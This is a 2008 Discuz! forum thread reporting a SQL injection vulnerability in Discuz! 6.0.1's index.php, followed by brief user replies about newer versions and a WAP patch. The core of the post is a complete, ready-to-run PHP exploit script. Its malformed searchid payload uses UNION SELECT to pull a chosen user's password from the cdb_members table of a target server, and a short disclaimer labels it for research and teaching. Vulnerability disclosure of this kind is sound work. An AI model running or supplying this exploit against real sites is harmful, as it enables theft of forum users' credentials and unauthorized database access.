Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

BUG举报-Discuz! index.php文件SQL注入漏洞

[复制链接]
erdai 发表于 2008-8-11 22:20:10 | 显示全部楼层 |阅读模式
受影响系统:
Discuz! Discuz! 6.0.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 30583

Discuz!是一款华人地区非常流行的Web论坛程序。

Discuz所运行的PHP环境可能存在编码转换的问题,远程攻击者可能利用此漏洞通过提交畸形的searchid参数,允许远程攻击者执行SQL注入攻击。

<*来源:James
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
+------------------------------------------------------------------+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY  james
+------------------------------------------------------------------+
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host:      target server \n";
echo "port:      the web port, usually 80\n";
echo "path:      path to discuz\n";
echo "uid :      user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";

$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-length: ".strlen($content)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content."\r\n\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo 'No response from '.$host;
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
   echo fgets($ock, 1024);
}
?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Discuz!
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://discuz.dismall.com/
骄纵 发表于 2008-8-12 15:17:48 | 显示全部楼层
受影响系统:
Discuz! Discuz! 6.0.1
现在是6.1.0了好不好啊?
回复

使用道具 举报

antdk 发表于 2008-8-12 20:21:01 | 显示全部楼层
还是有使用6.0.1的,原来wap的index.php是有这个问题。
回复

使用道具 举报

建站铺 发表于 2008-9-4 01:28:23 | 显示全部楼层
原来wap的index.php是有这个问题。
回复

使用道具 举报

童虎 发表于 2008-9-4 14:42:01 | 显示全部楼层
这个只要打了wap那个补丁就不会有问题了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-12-23 19:10 , Processed in 0.021701 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表